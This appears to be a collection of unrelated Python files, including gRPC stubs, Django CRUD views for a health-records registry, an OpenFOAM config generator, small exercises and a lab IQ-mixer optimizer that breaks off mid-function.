response_serializer=jobshop__pb2.Empty.SerializeToString, ), 'Setup': grpc.unary_unary_rpc_method_handler( servicer.Setup, request_deserializer=jobshop__pb2.SettingsMsg.FromString, response_serializer=jobshop__pb2.SetupMsg.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'env.Environment', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an 
EXPERIMENTAL API. class Environment(object): """Missing associated documentation comment in .proto file""" @staticmethod def ApplyAction(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/ApplyAction', jobshop__pb2.MasAction.SerializeToString, jobshop__pb2.MasActionResponse.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Reset(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Reset', jobshop__pb2.Empty.SerializeToString, jobshop__pb2.MasState.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Render(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Render', jobshop__pb2.Empty.SerializeToString, jobshop__pb2.Empty.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def SetSeed(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/SetSeed', jobshop__pb2.Seed.SerializeToString, jobshop__pb2.Empty.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def Setup(request, target, options=(), channel_credentials=None, call_credentials=None, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/env.Environment/Setup', jobshop__pb2.SettingsMsg.SerializeToString, jobshop__pb2.SetupMsg.FromString, options, channel_credentials, call_credentials, compression, wait_for_ready, timeout, metadata)
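# --- Usage sketch (illustrative, not generated) ---
# Wiring a concrete servicer into a gRPC server. The MyEnvironment subclass
# and port 50051 are assumptions for illustration.
#
#   from concurrent import futures
#
#   class MyEnvironment(EnvironmentServicer):
#       def Reset(self, request, context):
#           return jobshop__pb2.MasState()   # return an initial (empty) state
#
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
#   add_EnvironmentServicer_to_server(MyEnvironment(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()
#   server.wait_for_termination()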
python
import os class Config: """ Parent configuration class. """ DEBUG = False TESTING = False CSRF_ENABLED = True SECRET = os.getenv('SECRET') TITLE = "Test API" VERSION = "1.0" DESCRIPTION = "Demo API."
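# Usage sketch: per-environment configurations typically subclass the parent
# class above. These subclasses are an assumed extension for illustration.
class DevelopmentConfig(Config):
    """Configuration for local development."""
    DEBUG = True


class TestingConfig(Config):
    """Configuration for running the test suite."""
    TESTING = True
    DEBUG = True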
python
# coding=utf-8 from app.api.base.base_router import BaseRouter from app.config.config import HEADER from app.api.src.geo.provider import Provider class GeoTypesRoute(BaseRouter): def __init__(self): super().__init__() def get(self): answer = Provider().get_types() return answer, HEADER def options(self): return "OK", 200, {'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'GET,POST,DELETE,PUT,OPTIONS', 'Access-Control-Allow-Headers': 'X-Requested-With,Content-Type'}
python
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.views.generic import ListView, DetailView
from django.views.generic.edit import UpdateView, DeleteView, CreateView
from django.urls import reverse_lazy
from .forms import *
from django.db.models import Q


class FuncaoListView(ListView):
    model = Funcao
    template_name = 'funcao/funcao_list.html'
    context_object_name = "funcoes"
    paginate_by = 10

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = Funcao.objects.filter(
                Q(nome_funcao__icontains=query) | Q(cbo__icontains=query)
            )
        else:
            object_list = Funcao.objects.all()
        return object_list


class FuncaoDetailView(DetailView):
    model = Funcao
    template_name = 'funcao/detail.html'


class FuncaoCreateView(SuccessMessageMixin, CreateView):
    form_class = FuncaoForm
    template_name = 'funcao/create.html'
    success_url = reverse_lazy('public:funcao_create')
    success_message = "Função cadastrada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class FuncaoUpdateView(SuccessMessageMixin, UpdateView):
    model = Funcao
    form_class = FuncaoForm
    template_name = 'funcao/edit.html'
    success_url = reverse_lazy('public:funcao_list')
    success_message = "Função Editada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class FuncaoDeleteView(SuccessMessageMixin, DeleteView):
    model = Funcao
    template_name = 'funcao/delete.html'
    success_url = reverse_lazy('public:funcao_list')
    success_message = "A função %s foi apagada com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.nome_funcao)
        # note: previously this printed the whole object via obj.__dict__
        return super(FuncaoDeleteView, self).delete(request, *args, **kwargs)


################################################## EMPRESA ####################################################


class EmpresaListView(ListView):
    model = Empresa
    template_name = 'empresa/empresa_list.html'
    context_object_name = "empresas"
    paginate_by = 10

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = Empresa.objects.filter(
                Q(nome_empresa__icontains=query) | Q(cnpj__icontains=query)
            )
        else:
            object_list = Empresa.objects.all()
        return object_list


class EmpresaCreateView(SuccessMessageMixin, CreateView):
    form_class = EmpresaForm
    template_name = 'empresa/create.html'
    success_url = reverse_lazy('public:empresa_create')
    success_message = "Empresa cadastrada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class EmpresaDetailView(DetailView):
    model = Empresa
    template_name = 'empresa/detail.html'


class EmpresaUpdateView(SuccessMessageMixin, UpdateView):
    model = Empresa
    form_class = EmpresaForm
    template_name = 'empresa/edit.html'
    success_url = reverse_lazy('public:empresa_list')
    success_message = "Empresa Editada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class EmpresaDeleteView(SuccessMessageMixin, DeleteView):
    model = Empresa
    template_name = 'empresa/delete.html'
    success_url = reverse_lazy('public:empresa_list')
    success_message = "A Empresa %s foi apagada com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.nome_empresa)
        # note: previously this printed the whole object via obj.__dict__
        return super(EmpresaDeleteView, self).delete(request, *args, **kwargs)


################################################## PACIENTE ####################################################


class PacienteListView(ListView):
    model = Paciente
    template_name = 'paciente/paciente_list.html'
    context_object_name = "pacientes"
    paginate_by = 10

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = Paciente.objects.filter(
                Q(nome_paciente__icontains=query) | Q(cpf__icontains=query)
            )
        else:
            object_list = Paciente.objects.all()
        return object_list


class PacienteCreateView(SuccessMessageMixin, CreateView):
    form_class = PacienteForm
    template_name = 'paciente/create.html'
    success_url = reverse_lazy('public:paciente_create')
    success_message = "Paciente cadastrado com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class PacienteDetailView(DetailView):
    model = Paciente
    template_name = 'paciente/detail.html'


class PacienteUpdateView(SuccessMessageMixin, UpdateView):
    model = Paciente
    form_class = PacienteForm
    template_name = 'paciente/edit.html'
    success_url = reverse_lazy('public:paciente_list')
    success_message = "Paciente Editado com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class PacienteDeleteView(SuccessMessageMixin, DeleteView):
    model = Paciente
    template_name = 'paciente/delete.html'
    success_url = reverse_lazy('public:paciente_list')
    success_message = "O Paciente %s foi apagado com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.nome_paciente)
        # note: previously this printed the whole object via obj.__dict__
        return super(PacienteDeleteView, self).delete(request, *args, **kwargs)


################################################## exame ####################################################


class ExameListView(ListView):
    model = Exame
    template_name = 'exame/exame_list.html'
    context_object_name = "exames"
    paginate_by = 10

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = Exame.objects.filter(
                Q(nome_exame__icontains=query)
            )
        else:
            object_list = Exame.objects.all()
        return object_list


class ExameCreateView(SuccessMessageMixin, CreateView):
    form_class = ExameForm
    template_name = 'exame/create.html'
    success_url = reverse_lazy('public:exame_create')
    success_message = "Exame cadastrado com sucesso!"

    # def moeda(valor):
    #     print(valor)
    #     valor = valor.replace('.', '')
    #     valor = valor.replace(',', '.')
    #     return Decimal(valor)
    #     return valor

    def form_valid(self, form):
        # print('aki 2')
        # self.valor_colaborador = 6.0
        # self.valor_ems = 12.00
        self.object = form.save(commit=False)
        # print(self.object.valor_colaborador)
        # self.object.valor_exame = ExameCreateView.moeda(self.object.valor_colaborador)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class ExameDetailView(DetailView):
    model = Exame
    template_name = 'exame/detail.html'


class ExameUpdateView(SuccessMessageMixin, UpdateView):
    model = Exame
    form_class = ExameForm
    template_name = 'exame/edit.html'
    success_url = reverse_lazy('public:exame_list')
    success_message = "Exame Editado com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class ExameDeleteView(SuccessMessageMixin, DeleteView):
    model = Exame
    template_name = 'exame/delete.html'
    success_url = reverse_lazy('public:exame_list')
    success_message = "O Exame %s foi apagado com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.nome_exame)
        # note: previously this printed the whole object via obj.__dict__
        return super(ExameDeleteView, self).delete(request, *args, **kwargs)


################################################## ESPECIALIDADE MEDICA ####################################################


class EspecialidadeMedicaListView(ListView):
    model = EspecialidadeMedica
    template_name = 'especialidademedica/especialidademedica_list.html'
    context_object_name = "especialidademedicas"
    paginate_by = 5

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = EspecialidadeMedica.objects.filter(
                Q(especialidade_medica__icontains=query)
            )
        else:
            object_list = EspecialidadeMedica.objects.all()
        return object_list


class EspecialidadeMedicaCreateView(SuccessMessageMixin, CreateView):
    form_class = EspecialiadeMedicaForm
    template_name = 'especialidademedica/create.html'
    success_url = reverse_lazy('public:especialidademedica_create')
    success_message = "Especialidade Medica cadastrada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class EspecialidadeMedicaDetailView(DetailView):
    model = EspecialidadeMedica
    template_name = 'especialidademedica/detail.html'


class EspecialidadeMedicaUpdateView(SuccessMessageMixin, UpdateView):
    model = EspecialidadeMedica
    form_class = EspecialiadeMedicaForm
    template_name = 'especialidademedica/edit.html'
    success_url = reverse_lazy('public:especialidademedica_list')
    success_message = "Especialidade Medica Editada com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class EspecialidadeMedicaDeleteView(SuccessMessageMixin, DeleteView):
    model = EspecialidadeMedica
    template_name = 'especialidademedica/delete.html'
    success_url = reverse_lazy('public:especialidademedica_list')
    success_message = "A Especialidade Medica %s foi apagada com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.especialidade_medica)
        # note: previously this printed the whole object via obj.__dict__
        return super(EspecialidadeMedicaDeleteView, self).delete(request, *args, **kwargs)


################################################## PRESTADOR DE SERVIÇO ####################################################


class PrestadorServicoListView(ListView):
    model = PrestadorServico
    template_name = 'prestadorservico/prestadorservico_list.html'
    context_object_name = "prestadorservicos"
    paginate_by = 5

    def get_queryset(self):
        query = self.request.GET.get('search', None)
        if query:
            object_list = PrestadorServico.objects.filter(
                Q(nome_prestador__icontains=query)
            )
        else:
            object_list = PrestadorServico.objects.all()
        return object_list


class PrestadorServicoCreateView(SuccessMessageMixin, CreateView):
    form_class = PrestadorServicoForm
    template_name = 'prestadorservico/create.html'
    success_url = reverse_lazy('public:prestadorservico_create')
    success_message = "Prestador Serviço cadastrado com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuariocadastro = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class PrestadorServicoDetailView(DetailView):
    model = PrestadorServico
    template_name = 'prestadorservico/detail.html'


class PrestadorServicoUpdateView(SuccessMessageMixin, UpdateView):
    model = PrestadorServico
    form_class = PrestadorServicoForm
    template_name = 'prestadorservico/edit.html'
    success_url = reverse_lazy('public:prestadorservico_list')
    success_message = "Prestador de Serviço Editado com sucesso!"

    def form_valid(self, form):
        self.object = form.save(commit=False)
        self.object.idusuarioedicao = self.request.user.id
        messages.success(self.request, self.success_message)
        # note: previously this printed the whole object via obj.__dict__
        self.object.save()
        return HttpResponseRedirect(self.get_success_url())


class PrestadorServicoDeleteView(SuccessMessageMixin, DeleteView):
    model = PrestadorServico
    template_name = 'prestadorservico/delete.html'
    success_url = reverse_lazy('public:prestadorservico_list')
    success_message = "O Prestador de Serviço %s foi apagado com sucesso!"

    def delete(self, request, *args, **kwargs):
        obj = self.get_object()
        messages.success(self.request, self.success_message % obj.nome_prestador)
        # note: previously this printed the whole object via obj.__dict__
        return super(PrestadorServicoDeleteView, self).delete(request, *args, **kwargs)
python
nome = str(input("What is your name? ")).lower().strip()
if nome == "gustavo":
    print("What a beautiful name!")
elif nome == "pedro" or nome == "maria" or nome == "joão":
    print("Your name is quite popular.")
elif nome == "ana katarina":
    print("What an ugly name!")
else:
    print("Your name is rather boring.")
python
from .jsonexporter import JSONExporter from .ymlexporter import YMLExporter
python
from __future__ import absolute_import, division, print_function, unicode_literals import math import random import time from echomesh.sound import Level from echomesh.util.registry.Registry import Registry class _SystemFunction(object): def __init__(self, function, is_constant): self.function = function self.is_constant = is_constant _REGISTRY = Registry('System functions') def register(name, function, is_constant): _REGISTRY.register(_SystemFunction(function, is_constant), name) register('e', math.e, True) register('level', Level.input_level, False) register('pi', math.pi, True) register('random', random.random, False) register('time', time.time, False) get = _REGISTRY.get
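# Usage sketch (assumed semantics of Registry.get): `register` adds an entry
# under a name and `get(name)` returns the registered _SystemFunction, e.g.
#
#   register('tau', 2 * math.pi, True)  # an extra constant, for illustration
#   entry = get('time')
#   entry.is_constant                   # False: time.time() changes per call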
python
print('=====HOW MUCH PAINT?=====')
alt = float(input('What is the height of the wall? '))
lar = float(input('What is the width of the wall? '))
area = alt * lar
print('The wall area is {:.2f}m²!'.format(area))
print('You will need {} litres of paint to paint the wall.'.format(area / 2))
python
#########################################################################
#                                                                       #
#              C R A N F I E L D   U N I V E R S I T Y                  #
#                        2 0 1 9 / 2 0 2 0                              #
#                                                                       #
#             MSc in Aerospace Computational Engineering                #
#                                                                       #
#                       Group Design Project                            #
#                                                                       #
#          Driver File for the OpenFoam Automated Tool Chain            #
#                   Flow Past Cylinder Test Case                        #
#                                                                       #
#-----------------------------------------------------------------------#
#                                                                       #
# Main Contributors:                                                    #
#    Vadim Maltsev    (Email: [email protected])               #
#    Samali Liyanage  (Email: [email protected])             #
#    Elias Farah      (Email: [email protected])                 #
# Supervisor:                                                           #
#    Dr. Tom-Robin Teschner (Email: [email protected])         #
#                                                                       #
#########################################################################

from __future__ import division


class genForceCoeffsFile:
    # parameters: Parameters specified in the main driver
    # rasModel: if the simulation is turbulent then specify the RAS model
    def __init__(self, parameters):
        self.parameters = parameters
        self.Diam = parameters['Diam']
        self.U = parameters['U']
        self.geometry = 'cylinder'
        self.thick = parameters['thickness']
        self.CofR = [10 * self.Diam, 10 * self.Diam, self.thick / 2]
        self.lRef = self.Diam
        if parameters["topology"] == "2D":
            self.Aref = self.Diam * 0.5
        elif parameters["topology"] == "3D":
            self.Aref = self.Diam * self.thick
        self.liftDir = [0, 1, 0]
        self.dragDir = [1, 0, 0]
        self.pitchAxis = [0, 0, 1]

    def writeForceCoeffsFile(self):
        forceCoeffsFile = open("forceCoeffs", "w")
        forceCoeffsFile.write("/*--------------------------------*-C++-*------------------------------*\\")
        forceCoeffsFile.write("\n| ==========                 |                                         |")
        forceCoeffsFile.write("\n| \\\\      /  F ield          | OpenFoam: The Open Source CFD Toolbox   |")
        forceCoeffsFile.write("\n|  \\\\    /   O peration      | Version: check the installation         |")
        forceCoeffsFile.write("\n|   \\\\  /    A nd            | Website: www.openfoam.com               |")
        forceCoeffsFile.write("\n|    \\\\/     M anipulation   |                                         |")
        forceCoeffsFile.write("\n\\*---------------------------------------------------------------------*/")
        forceCoeffsFile.write("\n\nforceCoeffs1")
        forceCoeffsFile.write("\n{")
        forceCoeffsFile.write("\n    type            forceCoeffs;")
        forceCoeffsFile.write('\n    libs            ("libforces.so");')
        forceCoeffsFile.write("\n    writeControl    timeStep;")
        forceCoeffsFile.write("\n    timeInterval    1;")
        forceCoeffsFile.write("\n    log             yes;")
        forceCoeffsFile.write("\n    pRef            0;")
        forceCoeffsFile.write("\n    patches         (" + self.geometry + ");")
        forceCoeffsFile.write("\n    rho             rhoInf;")
        forceCoeffsFile.write("\n    rhoInf          " + str(self.parameters['rho']) + ";")
        forceCoeffsFile.write("\n    liftDir         (" + str(self.liftDir[0]) + " " + str(self.liftDir[1]) + " " + str(self.liftDir[2]) + ");")
        forceCoeffsFile.write("\n    dragDir         (" + str(self.dragDir[0]) + " " + str(self.dragDir[1]) + " " + str(self.dragDir[2]) + ");")
        forceCoeffsFile.write("\n    CofR            (" + str(self.CofR[0]) + " " + str(self.CofR[1]) + " " + str(self.CofR[2]) + ");")
        forceCoeffsFile.write("\n    pitchAxis       (" + str(self.pitchAxis[0]) + " " + str(self.pitchAxis[1]) + " " + str(self.pitchAxis[2]) + ");")
        forceCoeffsFile.write("\n    magUInf         " + str(self.U) + ";")
        forceCoeffsFile.write("\n    lRef            " + str(self.Diam) + ";")
        forceCoeffsFile.write("\n    Aref            " + str(self.Aref) + ";")
        forceCoeffsFile.write("\n    /*binData")
        forceCoeffsFile.write("\n    {")
        forceCoeffsFile.write("\n        nBin        20;")
        forceCoeffsFile.write("\n        direction   (1 0 0);")
        forceCoeffsFile.write("\n        cumulative  yes;")
        forceCoeffsFile.write("\n    }*/")
        forceCoeffsFile.write("\n}")
        forceCoeffsFile.write("\n\npressureCoeff1")
        forceCoeffsFile.write("\n{")
        forceCoeffsFile.write("\n    type            pressure;")
        forceCoeffsFile.write('\n    libs            ("libfieldFunctionObjects.so");')
        forceCoeffsFile.write("\n    writeControl    writeTime;")
        forceCoeffsFile.write("\n    timeInterval    " + str(self.parameters['writeInterval']) + ";")
        forceCoeffsFile.write("\n    log             yes;")
        forceCoeffsFile.write("\n    patch           (" + str(self.geometry) + ");")
        forceCoeffsFile.write("\n    rhoInf          " + str(self.parameters['rho']) + ";")
        forceCoeffsFile.write("\n    mode            totalCoeff;")
        forceCoeffsFile.write("\n    pRef            0;")
        forceCoeffsFile.write("\n    pInf            0;")
        forceCoeffsFile.write("\n    UInf            (" + str(self.U) + " 0 0);")
        forceCoeffsFile.write("\n}")
        forceCoeffsFile.write("\n\n// ******************************************************************* //")
        # close the file so the buffered content is flushed to disk (was missing)
        forceCoeffsFile.close()
python
# https://leetcode.com/problems/pascals-triangle/
class Solution(object):
    def generate(self, numRows):
        """
        :type numRows: int
        :rtype: List[List[int]]
        """
        if numRows == 0:
            return []
        if numRows == 1:
            return [[1]]
        if numRows == 2:
            return [[1], [1, 1]]

        res = [[1], [1, 1]]
        for i in range(2, numRows):
            temp = [1]
            for j in range(1, i):
                temp.append(res[i - 1][j - 1] + res[i - 1][j])
            temp.append(1)
            res.append(temp)
        return res
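
# Quick check of the solution above (a hypothetical driver, not part of the
# LeetCode harness): each row is the pairwise sums of the previous row.
if __name__ == '__main__':
    for row in Solution().generate(5):
        print(row)
    # Expected output:
    # [1]
    # [1, 1]
    # [1, 2, 1]
    # [1, 3, 3, 1]
    # [1, 4, 6, 4, 1]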
python
from .c2_server import C2Server
from .malware import Malware
from .actor import Actor
from .family import Family
python
import numpy as np
import itertools as it
import pylabnet.hardware.spectrum_analyzer.agilent_e4405B as sa_hardware
import time
import pandas as pd
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from IPython.display import clear_output, display


class Optimizer:

    def __init__(self):
        pass


class IQOptimizer(Optimizer):

    def __init__(
            self, mw_source, hd, sa, carrier, signal_freq, max_iterations=5,
            max_lower_sideband_pow=-58, max_carrier_pow=-58, num_points=25,
            cushion_param=5, param_guess=([60, 0.6, 0.65, -0.002, 0.006]),
            phase_window=44, q_window=0.34, dc_i_window=0.0135,
            dc_q_window=0.0115, plot_traces=True, awg_delay_time=0.0,
            averages=1, min_rounds=1, HDAWG_ports=[3, 4], oscillator=2):
        """Instantiate IQ optimizer

        :param mw_source: instance of HMC_T2220 client
        :param hd: instance of AWG client
        :param sa: instance of spectrum analyzer client
        :param carrier: desired carrier frequency (in Hz)
        :param signal_freq: desired signal frequency (in Hz)
        :kwarg num_points: number of points for scan window
        :kwarg plot_traces: user decides if displaying power vs. frequency plots is desired
        :kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
        :kwarg max_lower_sideband_pow: desired upper bound for lower sideband power (in dBm)
        :kwarg max_carrier_pow: desired upper bound for carrier power (in dBm)
        :kwarg cushion_param: positive real number positively correlated with speed of zooming in on minimum
        :kwarg param_guess: starting parameters for optimization:
            ([phase shift, q := (amp_i/amp_q) amplitude imbalance,
              a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
        :kwarg phase_window: size of initial phase scan (in degrees)
        :kwarg q_window: size of initial amplitude imbalance scan window (unitless)
        :kwarg dc_i_window: size of initial dc i offset scan window (in V)
        :kwarg dc_q_window: size of initial dc q offset scan window (in V)
        """

        # Configure hd settings

        # Assign oscillator 1 to sine output 2
        # hd.seti('sines/1/oscselect', 1)

        # Set carrier frequency
        hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)

        # Set I and Q amplitude, calculated from q and a0 in the param_guess array
        hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)),
                2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
        hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)),
                2 * param_guess[2] * (1 / (1 + param_guess[1])))

        # Set phase offset between I and Q
        hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])

        # Enable sine waves
        hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
        hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)

        self.mw_source = mw_source
        self.hd = hd
        self.sa = sa
        self.carrier = carrier
        self.signal_freq = signal_freq
        self.num_points = num_points
        self.max_iterations = max_iterations
        self.plot_traces = plot_traces
        self.cushion_param = cushion_param
        self.HDAWG_ports = HDAWG_ports

        # Set mw freq
        self.mw_source.output_on()
        self.mw_source.set_freq(self.carrier)

        # Instantiate IQ Optimizer sweep window
        self.phase_min = param_guess[0] - phase_window / 2
        self.phase_max = param_guess[0] + phase_window / 2
        self.q_min = param_guess[1] - q_window / 2
        self.q_max = param_guess[1] + q_window / 2
        self.a0 = param_guess[2]
        self.dc_min_i = param_guess[3] - dc_i_window / 2
        self.dc_max_i = param_guess[3] + dc_i_window / 2
        self.dc_min_q = param_guess[4] - dc_q_window / 2
        self.dc_max_q = param_guess[4] + dc_q_window / 2

        # Instantiate params we will optimize
        self.opt_phase = None
        self.opt_q = None
        self.amp_q_opt = None
        self.amp_i_opt = None
        self.dc_offset_i_opt = None
        self.dc_offset_q_opt = None

        # Instantiate arrays and bounds
        self.phases = np.linspace(self.phase_min, self.phase_max, self.num_points)
        self.qs = np.linspace(self.q_min, self.q_max, self.num_points)
        self.lower_sideband_power = np.zeros((self.num_points, self.num_points))
        self.opt_lower_sideband_pow = float("inf")
        self.opt_carrier_pow = float("inf")
        self.max_lower_sideband_pow = max_lower_sideband_pow
        self.max_carrier_pow = max_carrier_pow

        # Instantiate and set markers
        self.upp_sb_marker = None
        self.lower_sb_marker = None
        self.carrier_marker = None

        self.set_markers()

        self._AWG_DELAY_TIME = awg_delay_time
        self._averages = averages
        self._min_rounds = min_rounds

    def set_markers(self):
        # Configure hd to enable outputs
        # self.hd.enable_output(0)
        # self.hd.enable_output(1)

        # Center frequency at carrier frequency
        self.sa.set_center_frequency(self.carrier + self.signal_freq)
        self.sa.set_frequency_span(6 * self.signal_freq)

        # Markers for upper sideband, lower sideband and carrier
        self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
        self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
        self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)

        # define target frequencies
        markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
        target_freqs = np.array([self.carrier + self.signal_freq,
                                 self.carrier - self.signal_freq,
                                 self.carrier])
        max_deviation = 1e6

        for marker, target_freq in zip(markers, target_freqs):
            time.sleep(1)
            marker.set_freq(target_freq)
            # assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequency: {marker_freq / 1e9} GHz"
            self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")

        # Set reference level to just above the height of our signal to minimize our noise floor
        self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)

        if self.plot_traces:
            self.sa.plot_trace()

    def opt_lower_sideband(self):
        # Rough sweep
        self._sweep_phase_amp_imbalance()
        self._set_optimal_vals()

        # Instantiate local variables for the loop
        q_max2 = self.q_max
        q_min2 = self.q_min
        phase_max2 = self.phase_max
        phase_min2 = self.phase_min

        num_iterations = 0

        while (self.opt_lower_sideband_pow > self.max_lower_sideband_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations - 1:
            q_cushion = np.abs(q_max2 - q_min2) / self.cushion_param
            phase_cushion = np.abs(phase_max2 - phase_min2) / self.cushion_param

            # Reset sweep window to zoom in on minimum
            q_max2 = self.opt_q + q_cushion
            q_min2 = self.opt_q - q_cushion
            phase_max2 = self.opt_phase + phase_cushion
            phase_min2 = self.opt_phase - phase_cushion

            # Reinstantiate variables
            self.phases = np.linspace(phase_min2, phase_max2, self.num_points)
            self.qs = np.linspace(q_min2, q_max2, self.num_points)
            self.lower_sideband_power = np.zeros((self.num_points, self.num_points))

            self._sweep_phase_amp_imbalance()
            self._set_optimal_vals()

            num_iterations = num_iterations + 1

        if num_iterations < self.max_iterations:
            self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
        else:
            self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')

        time.sleep(1)
        self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')

        if self.plot_traces:
            # Heatmap plot
            lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
                                               index=np.round(self.phases, 1),
                                               columns=np.round(self.qs, 2))
            fig1, ax1 = plt.subplots(figsize=(8, 5))
            ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5,
                              cbar_kws={'label': 'lower sideband power [dBm]'})
            ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')
            # Frequency plot
            self.sa.plot_trace()

    def opt_carrier(self):
        num_iterations = 0

        # If carrier power is already below threshold, there is no need to optimize the carrier
        skipped = True
        if self.carrier_marker.get_power() > (self.max_carrier_pow - 10):
            skipped = False

            # Sweep 2D parameter space of DC offsets and record carrier power
            voltages_i = np.linspace(self.dc_min_i, self.dc_max_i, self.num_points)
            voltages_q = np.linspace(self.dc_min_q, self.dc_max_q, self.num_points)
            carrier_power = np.zeros((self.num_points, self.num_points))

            self.opt_carrier_pow = self.carrier_marker.get_power()

